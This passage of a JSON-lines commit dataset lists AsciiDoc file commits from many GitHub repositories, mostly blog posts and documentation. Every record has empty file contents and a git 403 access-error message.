unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"d373fc62ce66c69d108f28c7d5132f95b6e51391","subject":"Publish 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","message":"Publish 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","new_file":"17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marchelo2212\/marchelo2212.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b6cfb7bb153b19d9f54722c1a3d094d88c89316","subject":"Update 2015-07-21-Entity-Framework-some-lessons-learned.adoc","message":"Update 
2015-07-21-Entity-Framework-some-lessons-learned.adoc","repos":"rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au","old_file":"_posts\/2015-07-21-Entity-Framework-some-lessons-learned.adoc","new_file":"_posts\/2015-07-21-Entity-Framework-some-lessons-learned.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rrrhys\/blog.codeworkshop.com.au.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"288da263c11c167b18186701fda9379996fda8f3","subject":"Added empty summary file to try to force Gitbook to load project","message":"Added empty summary file to try to force Gitbook to load project\n","repos":"DBCG\/Dataphor,DBCG\/Dataphor,DBCG\/Dataphor,n8allan\/Dataphor,n8allan\/Dataphor,n8allan\/Dataphor,DBCG\/Dataphor,n8allan\/Dataphor,n8allan\/Dataphor,n8allan\/Dataphor,DBCG\/Dataphor,DBCG\/Dataphor","old_file":"SUMMARY.adoc","new_file":"SUMMARY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/n8allan\/Dataphor.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"6440f9035fcbf4a1e8cd9b0216e6447bf30a22c7","subject":"Update 2017-01-08-Eclipse-RCP-Scripting-Basics-EASE.adoc","message":"Update 2017-01-08-Eclipse-RCP-Scripting-Basics-EASE.adoc","repos":"rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io","old_file":"_posts\/2017-01-08-Eclipse-RCP-Scripting-Basics-EASE.adoc","new_file":"_posts\/2017-01-08-Eclipse-RCP-Scripting-Basics-EASE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rage5474\/rage5474.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77457d18c1cad22138289d658d733ce7b9c05db6","subject":"Coffee","message":"Coffee\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Objects & interfaces\/README.adoc","new_file":"Objects & interfaces\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42d90810958d05335dad0ebbf6adca1d79321dba","subject":"Update 2015-08-16-Test-Post-Title.adoc","message":"Update 2015-08-16-Test-Post-Title.adoc","repos":"abhayghatpande\/hubpress.io,abhayghatpande\/hubpress.io,abhayghatpande\/hubpress.io","old_file":"_posts\/2015-08-16-Test-Post-Title.adoc","new_file":"_posts\/2015-08-16-Test-Post-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/abhayghatpande\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1911d1d261164b0c8ad83423928a2e8967c1c07e","subject":"Update 2019-12-19-blog-poem-draft.adoc","message":"Update 2019-12-19-blog-poem-draft.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-12-19-blog-poem-draft.adoc","new_file":"_posts\/2019-12-19-blog-poem-draft.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': 
The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9acc4199cee1f03b3e5782d45c16b5bf13147dab","subject":"Create readme.asciidoc","message":"Create readme.asciidoc\n\nFile for Spanish Translation","repos":"ooms\/materials,ooms\/materials,devoxx4kids\/materials,devoxx4kids\/materials,devoxx4kids\/materials,devoxx4kids\/materials,ooms\/materials,ooms\/materials,ooms\/materials,ooms\/materials,devoxx4kids\/materials,devoxx4kids\/materials,devoxx4kids\/materials,ooms\/materials","old_file":"workshops\/minecraft\/es\/readme.asciidoc","new_file":"workshops\/minecraft\/es\/readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ooms\/materials.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"54795b152bf331b2f3ee0f14e08bcbe58327a5be","subject":"init(REPO): setup repository for BPMN model","message":"init(REPO): setup repository for BPMN model\n","repos":"langfr\/camunda-bpm-platform,ingorichtsmeier\/camunda-bpm-platform,langfr\/camunda-bpm-platform,langfr\/camunda-bpm-platform,ingorichtsmeier\/camunda-bpm-platform,ingorichtsmeier\/camunda-bpm-platform,camunda\/camunda-bpm-platform,langfr\/camunda-bpm-platform,ingorichtsmeier\/camunda-bpm-platform,ingorichtsmeier\/camunda-bpm-platform,camunda\/camunda-bpm-platform,camunda\/camunda-bpm-platform,ingorichtsmeier\/camunda-bpm-platform,camunda\/camunda-bpm-platform,camunda\/camunda-bpm-platform,langfr\/camunda-bpm-platform,camunda\/camunda-bpm-platform,langfr\/camunda-bpm-platform","old_file":"model-api\/bpmn-model\/README.asciidoc","new_file":"model-api\/bpmn-model\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/langfr\/camunda-bpm-platform.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a6774839291bd819075f62d305b371e430e1f78d","subject":"Update 2016-11-17-NSUCRYPTO-2016.adoc","message":"Update 2016-11-17-NSUCRYPTO-2016.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"364a2d59cf9b4152c8928b5f13e39f7fc223ae4a","subject":"Update 2015-09-26-OS-review.adoc","message":"Update 2015-09-26-OS-review.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-26-OS-review.adoc","new_file":"_posts\/2015-09-26-OS-review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f77fd7be5a438f90df0c88e1df6d65152540f868","subject":"Update 2015-10-21-Bienvenue.adoc","message":"Update 2015-10-21-Bienvenue.adoc","repos":"itsmyr4bbit\/blog,itsmyr4bbit\/blog,itsmyr4bbit\/blog","old_file":"_posts\/2015-10-21-Bienvenue.adoc","new_file":"_posts\/2015-10-21-Bienvenue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/itsmyr4bbit\/blog.git\/': 
The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f48a68e59452c3168b5ffacf8717c486c3ee88a5","subject":"Update 2017-02-05-Testing-1.adoc","message":"Update 2017-02-05-Testing-1.adoc","repos":"lichengzhu\/blog,lichengzhu\/blog,lichengzhu\/blog,lichengzhu\/blog","old_file":"_posts\/2017-02-05-Testing-1.adoc","new_file":"_posts\/2017-02-05-Testing-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lichengzhu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9df855202d7d91464fac991f6df7ce0d049ec405","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d5821c1ada8b7c260d6312abfc1710786ee6ab7","subject":"Update 2016-07-22-Control-Arms-in-IVIG-Trials.adoc","message":"Update 2016-07-22-Control-Arms-in-IVIG-Trials.adoc","repos":"zubrx\/zubrx.github.io,zubrx\/zubrx.github.io,zubrx\/zubrx.github.io,zubrx\/zubrx.github.io","old_file":"_posts\/2016-07-22-Control-Arms-in-IVIG-Trials.adoc","new_file":"_posts\/2016-07-22-Control-Arms-in-IVIG-Trials.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zubrx\/zubrx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06f5ff482aa2a5bf04b82637d511d26390af1412","subject":"y2b create post RC Airsoft Battle Tank Unboxing!","message":"y2b create post RC Airsoft Battle Tank Unboxing!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-02-RC-Airsoft-Battle-Tank-Unboxing.adoc","new_file":"_posts\/2011-12-02-RC-Airsoft-Battle-Tank-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b82f44a5638f71b6559687e658caedbabbe0e88b","subject":"Update 2017-11-13-DAL-Pop-Cyclone-T5040C-Review.adoc","message":"Update 2017-11-13-DAL-Pop-Cyclone-T5040C-Review.adoc","repos":"OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io","old_file":"_posts\/2017-11-13-DAL-Pop-Cyclone-T5040C-Review.adoc","new_file":"_posts\/2017-11-13-DAL-Pop-Cyclone-T5040C-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OctavioMaia\/octaviomaia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"241d419b243979c6f3707dd507c30752dd3baad0","subject":"Update 
2010-06-09-js-Chessboard-02-est-disponible.adoc","message":"Update 2010-06-09-js-Chessboard-02-est-disponible.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2010-06-09-js-Chessboard-02-est-disponible.adoc","new_file":"_posts\/2010-06-09-js-Chessboard-02-est-disponible.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6f421a87b173638445944f6a9d2d714485d1937","subject":"Update 2016-12-04-Get-Paid-for-Every-Contribution.adoc","message":"Update 2016-12-04-Get-Paid-for-Every-Contribution.adoc","repos":"tedbergeron\/Transition,tedbergeron\/Transition,tedbergeron\/Transition","old_file":"_posts\/2016-12-04-Get-Paid-for-Every-Contribution.adoc","new_file":"_posts\/2016-12-04-Get-Paid-for-Every-Contribution.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tedbergeron\/Transition.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa0587426f83edfd9b1441b2f4984a16fc1219d7","subject":"Adds docs","message":"Adds docs\n","repos":"cazacugmihai\/codebrag,softwaremill\/codebrag,cazacugmihai\/codebrag,softwaremill\/codebrag,cazacugmihai\/codebrag,cazacugmihai\/codebrag,cazacugmihai\/codebrag,softwaremill\/codebrag,softwaremill\/codebrag","old_file":"WEBHOOKS.adoc","new_file":"WEBHOOKS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cazacugmihai\/codebrag.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"718629fcf77bd945f5106c1c6365f4cf323c7081","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed55cb9759576aefefdccf9bb8e9efbc01ea6d5e","subject":"add optional step for more actuator endpoints","message":"add optional step for more actuator endpoints\n","repos":"mygithubwork\/boot-works,verydapeng\/boot-works,verydapeng\/boot-works,mygithubwork\/boot-works","old_file":"actuator.adoc","new_file":"actuator.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mygithubwork\/boot-works.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a06ba3c77223e5c78468c058a3de79911b413ddc","subject":"Update 2018-07-13-I-will-be-Vimmer.adoc","message":"Update 2018-07-13-I-will-be-Vimmer.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-13-I-will-be-Vimmer.adoc","new_file":"_posts\/2018-07-13-I-will-be-Vimmer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 
unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a35fa6356e9bafb7d180920177af56b327efd179","subject":"Update 2016-11-26-Todo.adoc","message":"Update 2016-11-26-Todo.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-26-Todo.adoc","new_file":"_posts\/2016-11-26-Todo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ab999eda3775fe2a2a3ff7aa0111af2e127c956","subject":"Publish 2016-7-8.adoc","message":"Publish 2016-7-8.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-8.adoc","new_file":"2016-7-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"420acbf76903124d006d9d4f48312886b62386ae","subject":"y2b create post It's Not What It Looks Like...","message":"y2b create post It's Not What It Looks Like...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-29-Its-Not-What-It-Looks-Like.adoc","new_file":"_posts\/2017-01-29-Its-Not-What-It-Looks-Like.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"353e7d0d26db4ea5e76f7c60f0e24ee0609eebb4","subject":"Update 2017-08-05-mecab.adoc","message":"Update 2017-08-05-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-05-mecab.adoc","new_file":"_posts\/2017-08-05-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34f52587064815e1c7f769e9e046efa3443e7897","subject":"[DOC] Adding version compatibility matrix for Spark in installation documentation.","message":"[DOC] Adding version compatibility matrix for Spark in installation documentation.\n\nfixes #890\n","repos":"elastic\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/intro\/download.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/intro\/download.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3766a25db820e3186ff154f073c9d9e1cee84df0","subject":"Update 2017-06-17-Validacao-versus-Verificacao.adoc","message":"Update 
2017-06-17-Validacao-versus-Verificacao.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-06-17-Validacao-versus-Verificacao.adoc","new_file":"_posts\/2017-06-17-Validacao-versus-Verificacao.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98ea0ff4f0d5c37ffb54ab4b178907e47cc1635c","subject":"Publish 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","message":"Publish 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","new_file":"17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educagiva.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marchelo2212\/marchelo2212.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"399f0cb740a931a159071d2cf1afb294fa14dd7f","subject":"y2b create post PlayStation 4 - Flip Screen Edition!","message":"y2b create post PlayStation 4 - Flip Screen Edition!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-02-PlayStation-4--Flip-Screen-Edition.adoc","new_file":"_posts\/2016-10-02-PlayStation-4--Flip-Screen-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8558c5ba1030d5d9dd7350b332fb974a7194c865","subject":"Changes to work around broken manual placed TOC rendering.","message":"Changes to work around broken manual placed TOC rendering.\n","repos":"ForensicArtifacts\/artifacts,pstirparo\/artifacts,Onager\/artifacts,Onager\/artifacts,ForensicArtifacts\/artifacts,pstirparo\/artifacts,joachimmetz\/artifacts,joachimmetz\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Onager\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dc6e4d6951a1f5effdfd0cf359ab8b7215b82197","subject":"Update 2017-04-28-Spaziergangeristik.adoc","message":"Update 2017-04-28-Spaziergangeristik.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-04-28-Spaziergangeristik.adoc","new_file":"_posts\/2017-04-28-Spaziergangeristik.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2143920e6a98a88f9a1e2c31d7dca052dadd2a9d","subject":"doc: implementers-guide: update section on skipping tests","message":"doc: implementers-guide: update section on skipping tests\n\nUpdate sections describing how a specific 
platform may skip tests by\nmarking them as inactive.\n\nSigned-off-by: Stuart Haslam <1fce01f364ef5298e64e07a42e08efeef153fa98@linaro.org>\nReviewed-by: Christophe Milard <99616a981fa4477cda708a70f78076761c0c9f1c@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"kalray\/odp-mppa,erachmi\/odp,nmorey\/odp,ravineet-singh\/odp,erachmi\/odp,nmorey\/odp,kalray\/odp-mppa,ravineet-singh\/odp,dkrot\/odp,rsalveti\/odp,mike-holmes-linaro\/odp,kalray\/odp-mppa,rsalveti\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,rsalveti\/odp,mike-holmes-linaro\/odp,kalray\/odp-mppa,erachmi\/odp,dkrot\/odp,kalray\/odp-mppa,kalray\/odp-mppa,rsalveti\/odp,ravineet-singh\/odp,erachmi\/odp,rsalveti\/odp,nmorey\/odp,dkrot\/odp,mike-holmes-linaro\/odp,dkrot\/odp,nmorey\/odp,kalray\/odp-mppa","old_file":"doc\/implementers-guide\/implementers-guide.adoc","new_file":"doc\/implementers-guide\/implementers-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"a6ba6d5dbd2265b008112b9549b6853f9a314ede","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c6abebc206cc83eccdb33cce2f4e81ed4eb63c8","subject":"Update 2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","message":"Update 2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","new_file":"_posts\/2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa1a5797e60390159de864d169b7f095c2d5fa04","subject":"Created Home (asciidoc)","message":"Created Home (asciidoc)","repos":"ehcache\/ehcache3,ljacomet\/ehcache3,cschanck\/ehcache3,albinsuresh\/ehcache3,jhouserizer\/ehcache3,GaryWKeim\/ehcache3,rkavanap\/ehcache3,jhouserizer\/ehcache3,ljacomet\/ehcache3,henri-tremblay\/ehcache3,cljohnso\/ehcache3,aurbroszniowski\/ehcache3,chrisdennis\/ehcache3,AbfrmBlr\/ehcache3,rkavanap\/ehcache3,lorban\/ehcache3,albinsuresh\/ehcache3,cljohnso\/ehcache3,lorban\/ehcache3,GaryWKeim\/ehcache3,chrisdennis\/ehcache3,alexsnaps\/ehcache3,cschanck\/ehcache3,AbfrmBlr\/ehcache3,aurbroszniowski\/ehcache3,ehcache\/ehcache3","old_file":"Home.asciidoc","new_file":"Home.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jhouserizer\/ehcache3.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ce52567f5a490bed57be47d520e889f043cc1058","subject":"Update 2016-07-08-title.adoc","message":"Update 2016-07-08-title.adoc","repos":"btsibr\/myhubpress,btsibr\/myhubpress,btsibr\/myhubpress,btsibr\/myhubpress","old_file":"_posts\/2016-07-08-title.adoc","new_file":"_posts\/2016-07-08-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/btsibr\/myhubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f9fca34496ca40a22965b7c955221f578305c2b","subject":"y2b create post 4 Unique iPhone Accessories","message":"y2b create post 4 Unique iPhone Accessories","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-01-4%20Unique%20iPhone%20Accessories.adoc","new_file":"_posts\/2017-12-01-4%20Unique%20iPhone%20Accessories.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed20291aade4856577d776b7c7772cf67b4bc5a2","subject":"doc: userguide: add descriptions of new packet manipulation APIs","message":"doc: userguide: add descriptions of new packet manipulation APIs\n\nAdd documentation of new packet manipulation APIs added for Monarch\nincluding:\n\nodp_packet_add_data()\nodp_packet_align()\nodp_packet_concat()\nodp_packet_copy_data()\nodp_packet_copy_from_mem()\nodp_packet_copy_from_pkt()\nodp_packet_copy_part()\nodp_packet_copy_to_mem()\nodp_packet_move_data()\nodp_packet_rem_data()\nodp_packet_split()\n\nSigned-off-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nReviewed-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\nSigned-off-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\n","repos":"nmorey\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,nmorey\/odp,erachmi\/odp,erachmi\/odp,erachmi\/odp,dkrot\/odp,nmorey\/odp,dkrot\/odp,dkrot\/odp,erachmi\/odp,dkrot\/odp,ravineet-singh\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,nmorey\/odp,ravineet-singh\/odp","old_file":"doc\/users-guide\/users-guide-packet.adoc","new_file":"doc\/users-guide\/users-guide-packet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"fe6c4d589c2e3640c12840e09e16db2a13710c8d","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 